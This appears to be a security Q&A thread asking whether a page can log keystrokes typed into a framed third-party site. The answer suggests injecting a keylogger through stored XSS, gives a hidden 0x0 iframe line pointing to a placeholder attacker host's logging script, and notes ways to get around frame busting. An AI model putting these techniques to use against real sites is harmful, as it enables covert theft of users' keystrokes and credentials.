9

Is it possible for a website to have a javascript keylogger and also contain an iframe that goes to a "client" site.

  • Can the the JS log all key strokes done on the client site?
  • Can the (host) iframe be invisible or 0 x 0 in size?
  • Can the "client" site detect and bust the iframe?
Improve this question

1 Answer 1

Reset to default
7

You can embed a .js file using a Stored XSS to perform the remote keylogging. Using Ajax, it should be easy to do the remote logging. Have a look at the Javascript Keylogger here. http://code.google.com/p/javascript-keylogger

Setting the iframe width and height to zero answers the second question

<iframe src="attacker.com/log.php" width="0" height="0">

What you are asking in the 3rd question is frame busting. There are techniques to do that, https://www.owasp.org/index.php/Clickjacking#Defending_with_Frame_Breaking_Scripts

Improve this answer
3
  • But frame busting is not reliable, if you have a XSS vulnerability, as you can, in IE8 and Chrome, use the XSS filter to destroy it. Commented Oct 31, 2012 at 8:51
  • For almost every mitigation whether on the OS level or the webapp level there is always a way to bypass when coupled with other vulnerabilities. Commented Nov 1, 2012 at 9:14
  • My point was, don't think that because you're using this technique, you're home free, and don't have to care about XSS vulnerabilities. Commented Nov 1, 2012 at 9:46

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.